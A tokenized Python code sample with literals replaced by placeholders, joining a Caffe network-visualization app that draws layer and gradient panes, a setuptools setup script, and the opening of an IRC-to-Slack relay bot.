<EOL> elif settings . caffevis_data_mean is None : <EOL> self . _data_mean = None <EOL> else : <EOL> self . _data_mean = np . array ( settings . caffevis_data_mean ) <EOL> while len ( self . _data_mean . shape ) < <NUM_LIT:1> : <EOL> self . _data_mean = np . expand_dims ( self . _data_mean , - <NUM_LIT:1> ) <EOL> if self . _data_mean is not None : <EOL> self . net . transformer . set_mean ( self . net . inputs [ <NUM_LIT:0> ] , self . _data_mean ) <EOL> check_force_backward_true ( settings . caffevis_deploy_prototxt ) <EOL> self . labels = None <EOL> if self . settings . caffevis_labels : <EOL> self . labels = read_label_file ( self . settings . caffevis_labels ) <EOL> self . proc_thread = None <EOL> self . jpgvis_thread = None <EOL> self . handled_frames = <NUM_LIT:0> <EOL> if settings . caffevis_jpg_cache_size < <NUM_LIT:10> * <NUM_LIT> ** <NUM_LIT:2> : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . img_cache = FIFOLimitedArrayCache ( settings . caffevis_jpg_cache_size ) <EOL> self . _populate_net_layer_info ( ) <EOL> def _populate_net_layer_info ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . net_layer_info = { } <EOL> for key in self . net . blobs . keys ( ) : <EOL> self . net_layer_info [ key ] = { } <EOL> blob_shape = self . net . blobs [ key ] . data . shape <EOL> assert len ( blob_shape ) in ( <NUM_LIT:2> , <NUM_LIT:4> ) , '<STR_LIT>' <EOL> self . net_layer_info [ key ] [ '<STR_LIT>' ] = ( len ( blob_shape ) == <NUM_LIT:4> ) <EOL> self . net_layer_info [ key ] [ '<STR_LIT>' ] = blob_shape [ <NUM_LIT:1> : ] <EOL> self . net_layer_info [ key ] [ '<STR_LIT>' ] = blob_shape [ <NUM_LIT:1> ] <EOL> self . net_layer_info [ key ] [ '<STR_LIT>' ] = get_tiles_height_width_ratio ( blob_shape [ <NUM_LIT:1> ] , self . settings . caffevis_layers_aspect_ratio ) <EOL> self . net_layer_info [ key ] [ '<STR_LIT>' ] = self . net_layer_info [ key ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . net_layer_info [ key ] [ '<STR_LIT>' ] = self . net_layer_info [ key ] [ '<STR_LIT>' ] [ <NUM_LIT:1> ] <EOL> def start ( self ) : <EOL> self . state = CaffeVisAppState ( self . net , self . settings , self . bindings , self . net_layer_info ) <EOL> self . state . drawing_stale = True <EOL> self . layer_print_names = [ get_pretty_layer_name ( self . settings , nn ) for nn in self . state . _layers ] <EOL> if self . proc_thread is None or not self . proc_thread . is_alive ( ) : <EOL> self . proc_thread = CaffeProcThread ( self . net , self . state , <EOL> self . settings . caffevis_frame_wait_sleep , <EOL> self . settings . caffevis_pause_after_keys , <EOL> self . settings . caffevis_heartbeat_required , <EOL> self . settings . caffevis_mode_gpu ) <EOL> self . proc_thread . start ( ) <EOL> if self . jpgvis_thread is None or not self . jpgvis_thread . is_alive ( ) : <EOL> self . jpgvis_thread = JPGVisLoadingThread ( self . settings , self . state , self . img_cache , <EOL> self . settings . caffevis_jpg_load_sleep , <EOL> self . settings . caffevis_heartbeat_required ) <EOL> self . jpgvis_thread . start ( ) <EOL> def get_heartbeats ( self ) : <EOL> return [ self . proc_thread . heartbeat , self . jpgvis_thread . heartbeat ] <EOL> def quit ( self ) : <EOL> print '<STR_LIT>' <EOL> with self . state . lock : <EOL> self . state . quit = True <EOL> if self . proc_thread != None : <EOL> for ii in range ( <NUM_LIT:3> ) : <EOL> self . proc_thread . join ( <NUM_LIT:1> ) <EOL> if not self . proc_thread . is_alive ( ) : <EOL> break <EOL> if self . proc_thread . is_alive ( ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . proc_thread = None <EOL> print '<STR_LIT>' <EOL> def _can_skip_all ( self , panes ) : <EOL> return ( '<STR_LIT>' not in panes . keys ( ) ) <EOL> def handle_input ( self , input_image , panes ) : <EOL> if self . debug_level > <NUM_LIT:1> : <EOL> print '<STR_LIT>' , self . handled_frames , '<STR_LIT>' , '<STR_LIT:None>' if input_image is None else '<STR_LIT>' <EOL> self . handled_frames += <NUM_LIT:1> <EOL> if self . _can_skip_all ( panes ) : <EOL> return <EOL> with self . state . lock : <EOL> if self . debug_level > <NUM_LIT:1> : <EOL> print '<STR_LIT>' <EOL> self . state . next_frame = input_image <EOL> if self . debug_level > <NUM_LIT:1> : <EOL> print '<STR_LIT>' , self . state . caffe_net_state <EOL> def redraw_needed ( self ) : <EOL> return self . state . redraw_needed ( ) <EOL> def draw ( self , panes ) : <EOL> if self . _can_skip_all ( panes ) : <EOL> if self . debug_level > <NUM_LIT:1> : <EOL> print '<STR_LIT>' <EOL> return False <EOL> with self . state . lock : <EOL> do_draw = self . state . drawing_stale and self . state . caffe_net_state == '<STR_LIT>' <EOL> if do_draw : <EOL> self . state . caffe_net_state = '<STR_LIT>' <EOL> if do_draw : <EOL> if self . debug_level > <NUM_LIT:1> : <EOL> print '<STR_LIT>' <EOL> if '<STR_LIT>' in panes : <EOL> self . _draw_control_pane ( panes [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in panes : <EOL> self . _draw_status_pane ( panes [ '<STR_LIT>' ] ) <EOL> layer_data_3D_highres = None <EOL> if '<STR_LIT>' in panes : <EOL> layer_data_3D_highres = self . _draw_layer_pane ( panes [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in panes : <EOL> self . _draw_aux_pane ( panes [ '<STR_LIT>' ] , layer_data_3D_highres ) <EOL> if '<STR_LIT>' in panes : <EOL> self . _draw_back_pane ( panes [ '<STR_LIT>' ] ) <EOL> if self . state . layers_pane_zoom_mode == <NUM_LIT:2> : <EOL> self . _draw_back_pane ( panes [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in panes : <EOL> self . _draw_jpgvis_pane ( panes [ '<STR_LIT>' ] ) <EOL> with self . state . lock : <EOL> self . state . drawing_stale = False <EOL> self . state . caffe_net_state = '<STR_LIT>' <EOL> return do_draw <EOL> def _draw_prob_labels_pane ( self , pane ) : <EOL> '''<STR_LIT>''' <EOL> if not self . labels or not self . state . show_label_predictions or not self . settings . caffevis_prob_layer : <EOL> return <EOL> defaults = { '<STR_LIT>' : getattr ( cv2 , self . settings . caffevis_class_face ) , <EOL> '<STR_LIT>' : self . settings . caffevis_class_fsize , <EOL> '<STR_LIT>' : to_255 ( self . settings . caffevis_class_clr_0 ) , <EOL> '<STR_LIT>' : self . settings . caffevis_class_thick } <EOL> loc = self . settings . caffevis_class_loc [ : : - <NUM_LIT:1> ] <EOL> clr_0 = to_255 ( self . settings . caffevis_class_clr_0 ) <EOL> clr_1 = to_255 ( self . settings . caffevis_class_clr_1 ) <EOL> probs_flat = self . net . blobs [ self . settings . caffevis_prob_layer ] . data . flatten ( ) <EOL> top_5 = probs_flat . argsort ( ) [ - <NUM_LIT:1> : - <NUM_LIT:6> : - <NUM_LIT:1> ] <EOL> strings = [ ] <EOL> pmax = probs_flat [ top_5 [ <NUM_LIT:0> ] ] <EOL> for idx in top_5 : <EOL> prob = probs_flat [ idx ] <EOL> text = '<STR_LIT>' % ( prob , self . labels [ idx ] ) <EOL> fs = FormattedString ( text , defaults ) <EOL> fs . clr = tuple ( [ max ( <NUM_LIT:0> , min ( <NUM_LIT:255> , clr_1 [ ii ] * prob + clr_0 [ ii ] * ( <NUM_LIT:1> - prob ) ) ) for ii in range ( <NUM_LIT:3> ) ] ) <EOL> strings . append ( [ fs ] ) <EOL> cv2_typeset_text ( pane . data , strings , loc , <EOL> line_spacing = self . settings . caffevis_class_line_spacing ) <EOL> def _draw_control_pane ( self , pane ) : <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> with self . state . lock : <EOL> layer_idx = self . state . layer_idx <EOL> loc = self . settings . caffevis_control_loc [ : : - <NUM_LIT:1> ] <EOL> strings = [ ] <EOL> defaults = { '<STR_LIT>' : getattr ( cv2 , self . settings . caffevis_control_face ) , <EOL> '<STR_LIT>' : self . settings . caffevis_control_fsize , <EOL> '<STR_LIT>' : to_255 ( self . settings . caffevis_control_clr ) , <EOL> '<STR_LIT>' : self . settings . caffevis_control_thick } <EOL> for ii in range ( len ( self . layer_print_names ) ) : <EOL> fs = FormattedString ( self . layer_print_names [ ii ] , defaults ) <EOL> this_layer = self . state . _layers [ ii ] <EOL> if self . state . backprop_selection_frozen and this_layer == self . state . backprop_layer : <EOL> fs . clr = to_255 ( self . settings . caffevis_control_clr_bp ) <EOL> fs . thick = self . settings . caffevis_control_thick_bp <EOL> if this_layer == self . state . layer : <EOL> if self . state . cursor_area == '<STR_LIT>' : <EOL> fs . clr = to_255 ( self . settings . caffevis_control_clr_cursor ) <EOL> fs . thick = self . settings . caffevis_control_thick_cursor <EOL> else : <EOL> if not ( self . state . backprop_selection_frozen and this_layer == self . state . backprop_layer ) : <EOL> fs . clr = to_255 ( self . settings . caffevis_control_clr_selected ) <EOL> fs . thick = self . settings . caffevis_control_thick_selected <EOL> strings . append ( fs ) <EOL> cv2_typeset_text ( pane . data , strings , loc , <EOL> line_spacing = self . settings . caffevis_control_line_spacing , <EOL> wrap = True ) <EOL> def _draw_status_pane ( self , pane ) : <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> defaults = { '<STR_LIT>' : getattr ( cv2 , self . settings . caffevis_status_face ) , <EOL> '<STR_LIT>' : self . settings . caffevis_status_fsize , <EOL> '<STR_LIT>' : to_255 ( self . settings . caffevis_status_clr ) , <EOL> '<STR_LIT>' : self . settings . caffevis_status_thick } <EOL> loc = self . settings . caffevis_status_loc [ : : - <NUM_LIT:1> ] <EOL> status = StringIO . StringIO ( ) <EOL> fps = self . proc_thread . approx_fps ( ) <EOL> with self . state . lock : <EOL> print >> status , '<STR_LIT>' if self . state . pattern_mode else ( '<STR_LIT>' if self . state . layers_show_back else '<STR_LIT>' ) , <EOL> print >> status , '<STR_LIT>' % ( self . state . layer , self . state . selected_unit ) , <EOL> if not self . state . back_enabled : <EOL> print >> status , '<STR_LIT>' , <EOL> else : <EOL> print >> status , '<STR_LIT>' % ( '<STR_LIT>' if self . state . back_mode == '<STR_LIT>' else '<STR_LIT>' ) , <EOL> print >> status , '<STR_LIT>' % ( self . state . backprop_layer , <EOL> self . state . backprop_unit , <EOL> self . state . back_filt_mode ) , <EOL> print >> status , '<STR_LIT:|>' , <EOL> print >> status , '<STR_LIT>' % ( self . state . layer_boost_indiv , self . state . layer_boost_gamma ) <EOL> if fps > <NUM_LIT:0> : <EOL> print >> status , '<STR_LIT>' % fps <EOL> if self . state . extra_msg : <EOL> print >> status , '<STR_LIT:|>' , self . state . extra_msg <EOL> self . state . extra_msg = '<STR_LIT>' <EOL> strings = [ FormattedString ( line , defaults ) for line in status . getvalue ( ) . split ( '<STR_LIT:\n>' ) ] <EOL> cv2_typeset_text ( pane . data , strings , loc , <EOL> line_spacing = self . settings . caffevis_status_line_spacing ) <EOL> def _draw_layer_pane ( self , pane ) : <EOL> '''<STR_LIT>''' <EOL> if self . state . layers_show_back : <EOL> layer_dat_3D = self . net . blobs [ self . state . layer ] . diff [ <NUM_LIT:0> ] <EOL> else : <EOL> layer_dat_3D = self . net . blobs [ self . state . layer ] . data [ <NUM_LIT:0> ] <EOL> if len ( layer_dat_3D . shape ) == <NUM_LIT:1> : <EOL> layer_dat_3D = layer_dat_3D [ : , np . newaxis , np . newaxis ] <EOL> n_tiles = layer_dat_3D . shape [ <NUM_LIT:0> ] <EOL> tile_rows , tile_cols = self . net_layer_info [ self . state . layer ] [ '<STR_LIT>' ] <EOL> display_3D_highres = None <EOL> if self . state . pattern_mode : <EOL> load_layer = self . state . layer <EOL> if self . settings . caffevis_jpgvis_remap and self . state . layer in self . settings . caffevis_jpgvis_remap : <EOL> load_layer = self . settings . caffevis_jpgvis_remap [ self . state . layer ] <EOL> if self . settings . caffevis_jpgvis_layers and load_layer in self . settings . caffevis_jpgvis_layers : <EOL> jpg_path = os . path . join ( self . settings . caffevis_unit_jpg_dir , <EOL> '<STR_LIT>' , load_layer , '<STR_LIT>' ) <EOL> display_3D_highres = self . img_cache . get ( ( jpg_path , '<STR_LIT>' ) , None ) <EOL> if display_3D_highres is None : <EOL> try : <EOL> with WithTimer ( '<STR_LIT>' , quiet = self . debug_level < <NUM_LIT:1> ) : <EOL> display_3D_highres = load_square_sprite_image ( jpg_path , n_sprites = n_tiles ) <EOL> except IOError : <EOL> pass <EOL> else : <EOL> self . img_cache . set ( ( jpg_path , '<STR_LIT>' ) , display_3D_highres ) <EOL> if display_3D_highres is not None : <EOL> row_downsamp_factor = int ( np . ceil ( float ( display_3D_highres . shape [ <NUM_LIT:1> ] ) / ( pane . data . shape [ <NUM_LIT:0> ] / tile_rows - <NUM_LIT:2> ) ) ) <EOL> col_downsamp_factor = int ( np . ceil ( float ( display_3D_highres . shape [ <NUM_LIT:2> ] ) / ( pane . data . shape [ <NUM_LIT:1> ] / tile_cols - <NUM_LIT:2> ) ) ) <EOL> ds = max ( row_downsamp_factor , col_downsamp_factor ) <EOL> if ds > <NUM_LIT:1> : <EOL> display_3D = display_3D_highres [ : , : : ds , : : ds , : ] <EOL> else : <EOL> display_3D = display_3D_highres <EOL> else : <EOL> display_3D = layer_dat_3D * <NUM_LIT:0> <EOL> else : <EOL> if self . state . layers_show_back : <EOL> back_what_to_disp = self . get_back_what_to_disp ( ) <EOL> if back_what_to_disp == '<STR_LIT>' : <EOL> layer_dat_3D_normalized = np . tile ( self . settings . window_background , layer_dat_3D . shape + ( <NUM_LIT:1> , ) ) <EOL> elif back_what_to_disp == '<STR_LIT>' : <EOL> layer_dat_3D_normalized = np . tile ( self . settings . stale_background , layer_dat_3D . shape + ( <NUM_LIT:1> , ) ) <EOL> else : <EOL> layer_dat_3D_normalized = tile_images_normalize ( layer_dat_3D , <EOL> boost_indiv = self . state . layer_boost_indiv , <EOL> boost_gamma = self . state . layer_boost_gamma , <EOL> neg_pos_colors = ( ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) ) ) <EOL> else : <EOL> layer_dat_3D_normalized = tile_images_normalize ( layer_dat_3D , <EOL> boost_indiv = self . state . layer_boost_indiv , <EOL> boost_gamma = self . state . layer_boost_gamma ) <EOL> display_3D = layer_dat_3D_normalized <EOL> display_3D = ensure_float01 ( display_3D ) <EOL> if len ( display_3D . shape ) == <NUM_LIT:3> : <EOL> display_3D = display_3D [ : , : , : , np . newaxis ] <EOL> if display_3D . shape [ <NUM_LIT:3> ] == <NUM_LIT:1> : <EOL> display_3D = np . tile ( display_3D , ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> if display_3D . shape [ <NUM_LIT:1> ] == <NUM_LIT:1> : <EOL> display_3D = np . tile ( display_3D , ( <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> if self . state . layers_show_back and not self . state . pattern_mode : <EOL> padval = self . settings . caffevis_layer_clr_back_background <EOL> else : <EOL> padval = self . settings . window_background <EOL> highlights = [ None ] * n_tiles <EOL> with self . state . lock : <EOL> if self . state . cursor_area == '<STR_LIT>' : <EOL> highlights [ self . state . selected_unit ] = self . settings . caffevis_layer_clr_cursor <EOL> if self . state . backprop_selection_frozen and self . state . layer == self . state . backprop_layer : <EOL> highlights [ self . state . backprop_unit ] = self . settings . caffevis_layer_clr_back_sel <EOL> _ , display_2D = tile_images_make_tiles ( display_3D , hw = ( tile_rows , tile_cols ) , padval = padval , highlights = highlights ) <EOL> if display_3D_highres is None : <EOL> display_3D_highres = display_3D <EOL> state_layers_pane_zoom_mode = self . state . layers_pane_zoom_mode <EOL> assert state_layers_pane_zoom_mode in ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> if state_layers_pane_zoom_mode == <NUM_LIT:0> : <EOL> display_2D_resize = ensure_uint255_and_resize_to_fit ( display_2D , pane . data . shape ) <EOL> elif state_layers_pane_zoom_mode == <NUM_LIT:1> : <EOL> unit_data = display_3D_highres [ self . state . selected_unit ] <EOL> display_2D_resize = ensure_uint255_and_resize_to_fit ( unit_data , pane . data . shape ) <EOL> else : <EOL> display_2D_resize = ensure_uint255_and_resize_to_fit ( display_2D , pane . data . shape ) * <NUM_LIT:0> <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> pane . data [ <NUM_LIT:0> : display_2D_resize . shape [ <NUM_LIT:0> ] , <NUM_LIT:0> : display_2D_resize . shape [ <NUM_LIT:1> ] , : ] = display_2D_resize <EOL> if self . settings . caffevis_label_layers and self . state . layer in self . settings . caffevis_label_layers and self . labels and self . state . cursor_area == '<STR_LIT>' : <EOL> defaults = { '<STR_LIT>' : getattr ( cv2 , self . settings . caffevis_label_face ) , <EOL> '<STR_LIT>' : self . settings . caffevis_label_fsize , <EOL> '<STR_LIT>' : to_255 ( self . settings . caffevis_label_clr ) , <EOL> '<STR_LIT>' : self . settings . caffevis_label_thick } <EOL> loc_base = self . settings . caffevis_label_loc [ : : - <NUM_LIT:1> ] <EOL> lines = [ FormattedString ( self . labels [ self . state . selected_unit ] , defaults ) ] <EOL> cv2_typeset_text ( pane . data , lines , loc_base ) <EOL> return display_3D_highres <EOL> def _draw_aux_pane ( self , pane , layer_data_normalized ) : <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> mode = None <EOL> with self . state . lock : <EOL> if self . state . cursor_area == '<STR_LIT>' : <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> mode = '<STR_LIT>' <EOL> if mode == '<STR_LIT>' : <EOL> unit_data = layer_data_normalized [ self . state . selected_unit ] <EOL> unit_data_resize = ensure_uint255_and_resize_to_fit ( unit_data , pane . data . shape ) <EOL> pane . data [ <NUM_LIT:0> : unit_data_resize . shape [ <NUM_LIT:0> ] , <NUM_LIT:0> : unit_data_resize . shape [ <NUM_LIT:1> ] , : ] = unit_data_resize <EOL> elif mode == '<STR_LIT>' : <EOL> self . _draw_prob_labels_pane ( pane ) <EOL> def _draw_back_pane ( self , pane ) : <EOL> mode = None <EOL> with self . state . lock : <EOL> back_enabled = self . state . back_enabled <EOL> back_mode = self . state . back_mode <EOL> back_filt_mode = self . state . back_filt_mode <EOL> state_layer = self . state . layer <EOL> selected_unit = self . state . selected_unit <EOL> back_what_to_disp = self . get_back_what_to_disp ( ) <EOL> if back_what_to_disp == '<STR_LIT>' : <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> elif back_what_to_disp == '<STR_LIT>' : <EOL> pane . data [ : ] = to_255 ( self . settings . stale_background ) <EOL> else : <EOL> grad_blob = self . net . blobs [ '<STR_LIT:data>' ] . diff <EOL> grad_blob = grad_blob [ <NUM_LIT:0> ] <EOL> grad_blob = grad_blob . transpose ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> grad_img = grad_blob [ : , : , self . _net_channel_swap_inv ] <EOL> assert back_mode in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert back_filt_mode in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if back_filt_mode == '<STR_LIT>' : <EOL> grad_img = norm01c ( grad_img , <NUM_LIT:0> ) <EOL> elif back_filt_mode == '<STR_LIT>' : <EOL> grad_img = grad_img . mean ( axis = <NUM_LIT:2> ) <EOL> grad_img = norm01c ( grad_img , <NUM_LIT:0> ) <EOL> elif back_filt_mode == '<STR_LIT>' : <EOL> grad_img = np . linalg . norm ( grad_img , axis = <NUM_LIT:2> ) <EOL> grad_img = norm01 ( grad_img ) <EOL> else : <EOL> grad_img = np . linalg . norm ( grad_img , axis = <NUM_LIT:2> ) <EOL> cv2 . GaussianBlur ( grad_img , ( <NUM_LIT:0> , <NUM_LIT:0> ) , self . settings . caffevis_grad_norm_blur_radius , grad_img ) <EOL> grad_img = norm01 ( grad_img ) <EOL> if len ( grad_img . shape ) == <NUM_LIT:2> : <EOL> grad_img = np . tile ( grad_img [ : , : , np . newaxis ] , <NUM_LIT:3> ) <EOL> grad_img_resize = ensure_uint255_and_resize_to_fit ( grad_img , pane . data . shape ) <EOL> pane . data [ <NUM_LIT:0> : grad_img_resize . shape [ <NUM_LIT:0> ] , <NUM_LIT:0> : grad_img_resize . shape [ <NUM_LIT:1> ] , : ] = grad_img_resize <EOL> def _draw_jpgvis_pane ( self , pane ) : <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> with self . state . lock : <EOL> state_layer , state_selected_unit , cursor_area , show_unit_jpgs = self . state . layer , self . state . selected_unit , self . state . cursor_area , self . state . show_unit_jpgs <EOL> try : <EOL> self . settings . caffevis_jpgvis_layers <EOL> except : <EOL> print '<STR_LIT>' <EOL> raise <EOL> if self . settings . caffevis_jpgvis_remap and state_layer in self . settings . caffevis_jpgvis_remap : <EOL> img_key_layer = self . settings . caffevis_jpgvis_remap [ state_layer ] <EOL> else : <EOL> img_key_layer = state_layer <EOL> if self . settings . caffevis_jpgvis_layers and img_key_layer in self . settings . caffevis_jpgvis_layers and cursor_area == '<STR_LIT>' and show_unit_jpgs : <EOL> img_key = ( img_key_layer , state_selected_unit , pane . data . shape ) <EOL> img_resize = self . img_cache . get ( img_key , None ) <EOL> if img_resize is None : <EOL> with self . state . lock : <EOL> self . state . jpgvis_to_load_key = img_key <EOL> pane . data [ : ] = to_255 ( self . settings . stale_background ) <EOL> elif img_resize . nbytes == <NUM_LIT:0> : <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> else : <EOL> pane . data [ : img_resize . shape [ <NUM_LIT:0> ] , : img_resize . shape [ <NUM_LIT:1> ] , : ] = img_resize <EOL> else : <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> def handle_key ( self , key , panes ) : <EOL> return self . state . handle_key ( key ) <EOL> def get_back_what_to_disp ( self ) : <EOL> '''<STR_LIT>''' <EOL> if ( self . state . cursor_area == '<STR_LIT>' and not self . state . backprop_selection_frozen ) or not self . state . back_enabled : <EOL> return '<STR_LIT>' <EOL> elif self . state . back_stale : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> def set_debug ( self , level ) : <EOL> self . debug_level = level <EOL> self . proc_thread . debug_level = level <EOL> self . jpgvis_thread . debug_level = level <EOL> def draw_help ( self , help_pane , locy ) : <EOL> defaults = { '<STR_LIT>' : getattr ( cv2 , self . settings . help_face ) , <EOL> '<STR_LIT>' : self . settings . help_fsize , <EOL> '<STR_LIT>' : to_255 ( self . settings . help_clr ) , <EOL> '<STR_LIT>' : self . settings . help_thick } <EOL> loc_base = self . settings . help_loc [ : : - <NUM_LIT:1> ] <EOL> locx = loc_base [ <NUM_LIT:0> ] <EOL> lines = [ ] <EOL> lines . append ( [ FormattedString ( '<STR_LIT>' , defaults ) ] ) <EOL> lines . append ( [ FormattedString ( '<STR_LIT>' , defaults ) ] ) <EOL> kl , _ = self . bindings . get_key_help ( '<STR_LIT>' ) <EOL> kr , _ = self . bindings . get_key_help ( '<STR_LIT>' ) <EOL> ku , _ = self . bindings . get_key_help ( '<STR_LIT>' ) <EOL> kd , _ = self . bindings . get_key_help ( '<STR_LIT>' ) <EOL> klf , _ = self . bindings . get_key_help ( '<STR_LIT>' ) <EOL> krf , _ = self . bindings . get_key_help ( '<STR_LIT>' ) <EOL> kuf , _ = self . bindings . get_key_help ( '<STR_LIT>' ) <EOL> kdf , _ = self . bindings . get_key_help ( '<STR_LIT>' ) <EOL> keys_nav_0 = '<STR_LIT:U+002C>' . join ( [ kk [ <NUM_LIT:0> ] for kk in ( kl , kr , ku , kd ) ] ) <EOL> keys_nav_1 = '<STR_LIT>' <EOL> if len ( kl ) > <NUM_LIT:1> and len ( kr ) > <NUM_LIT:1> and len ( ku ) > <NUM_LIT:1> and len ( kd ) > <NUM_LIT:1> : <EOL> keys_nav_1 += '<STR_LIT>' <EOL> keys_nav_1 += '<STR_LIT:U+002C>' . join ( [ kk [ <NUM_LIT:1> ] for kk in ( kl , kr , ku , kd ) ] ) <EOL> keys_nav_f = '<STR_LIT:U+002C>' . join ( [ kk [ <NUM_LIT:0> ] for kk in ( klf , krf , kuf , kdf ) ] ) <EOL> nav_string = '<STR_LIT>' % ( keys_nav_0 , keys_nav_1 , keys_nav_f ) <EOL> lines . append ( [ FormattedString ( '<STR_LIT>' , defaults , width = <NUM_LIT> , align = '<STR_LIT:right>' ) , <EOL> FormattedString ( nav_string , defaults ) ] ) <EOL> for tag in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> key_strings , help_string = self . bindings . get_key_help ( tag ) <EOL> label = '<STR_LIT>' % ( '<STR_LIT:U+002C>' . join ( key_strings ) ) <EOL> lines . append ( [ FormattedString ( label , defaults , width = <NUM_LIT> , align = '<STR_LIT:right>' ) , <EOL> FormattedString ( help_string , defaults ) ] ) <EOL> locy = cv2_typeset_text ( help_pane . data , lines , ( locx , locy ) , <EOL> line_spacing = self . settings . help_line_spacing ) <EOL> return locy </s>
<s> import os <EOL> from setuptools import find_packages , setup <EOL> name = '<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> readme = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> long_description = open ( readme ) . read ( ) <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> setup ( name = name , <EOL> version = version , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_description , <EOL> classifiers = classifiers , <EOL> keywords = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> tests_require = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' ] ) <EOL> ) </s>
<s> import sys <EOL> sys . dont_write_bytecode = True <EOL> import sys <EOL> import time <EOL> from ircclient . struct import Message <EOL> from ircclient . client import DispatchClient as IrcClient <EOL> from bot import BotMixin <EOL> from util import dbg , load_config <EOL> def log_send ( s ) : <EOL> print ( '<STR_LIT>' , s , ) <EOL> class IrcBot ( BotMixin ) : <EOL> def __init__ ( self , host , port , config ) : <EOL> self . name = config . get ( '<STR_LIT:name>' , None ) <EOL> self . last_ping = <NUM_LIT:0> <EOL> self . bot_plugins = [ ] <EOL> self . irc_client = None <EOL> self . addr = ( host , port ) <EOL> self . plugin = '<STR_LIT>' <EOL> self . config = config <EOL> self . relay_outs = [ ] <EOL> assert self . config <EOL> def connect ( self ) : <EOL> """<STR_LIT>""" <EOL> print ( '<STR_LIT>' , self . addr ) <EOL> self . irc_client = IrcClient ( self . addr , blocking = False ) <EOL> self . irc_client . socket . send_callback = log_send <EOL> self . irc_client . connect ( ) <EOL> def init ( self ) : <EOL> self . connect ( ) <EOL> self . load_plugins ( ) <EOL> def process ( self ) : <EOL> self . irc_client . runloop_unit ( ) <EOL> while True : <EOL> message = self . irc_client . dispatch ( raw = True ) <EOL> if message : <EOL> self . input ( message ) <EOL> self . crons ( ) <EOL> self . output ( ) <EOL> if not self . irc_client . dispatchable ( ) : <EOL> break <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> def input ( self , data ) : <EOL> data = Message ( data ) <EOL> function_name = "<STR_LIT>" + data . type . lower ( ) <EOL> dbg ( "<STR_LIT>" . format ( function_name ) ) <EOL> for plugin in self . bot_plugins : <EOL> plugin . register_jobs ( ) <EOL> plugin . do ( function_name , data ) <EOL> def autoping ( self ) : <EOL> now = int ( time . time ( ) ) <EOL> if now > self . last_ping + <NUM_LIT:30> : <EOL> self . irc_client . send_line ( '<STR_LIT>' ) <EOL> self . last_ping = now <EOL> def send_item ( self , data ) : <EOL> self . irc_client ( data ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> def relay ( self , bot , relay_ins ) : <EOL> def channel_for ( channel_id ) : <EOL> return bot . slack_client . server . channels . find ( channel_id ) <EOL> def name ( channel ) : <EOL> if self . name : <EOL> if not channel . name . startswith ( self . name ) : <EOL> return None <EOL> return channel . name . split ( '<STR_LIT:->' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> else : <EOL> return channel . name <EOL> for data in relay_ins : <EOL> if '<STR_LIT>' in data : <EOL> channel = channel_for ( data [ '<STR_LIT>' ] ) <EOL> if channel is None : <EOL> continue <EOL> if data [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> line = u'<STR_LIT>' . format ( name ( channel ) ) <EOL> self . irc_client . send_line ( line ) <EOL> elif data [ '<STR_LIT:type>' ] == '<STR_LIT:message>' : <EOL> print ( '<STR_LIT>' , data ) <EOL> message = data . get ( '<STR_LIT:text>' , '<STR_LIT>' ) <EOL> try : <EOL> import html <EOL> message = html . unescape ( message ) <EOL> except ImportError : <EOL> pass <EOL> message = message . replace ( '<STR_LIT:\r>' , '<STR_LIT:U+0020>' ) . replace ( '<STR_LIT:\n>' , r'<STR_LIT:U+0020>' ) <EOL> user_id = data . get ( '<STR_LIT:user>' , None ) <EOL> if user_id : <EOL> user = bot . slack_client . server . users . find ( user_id ) <EOL> else : <EOL> user = None 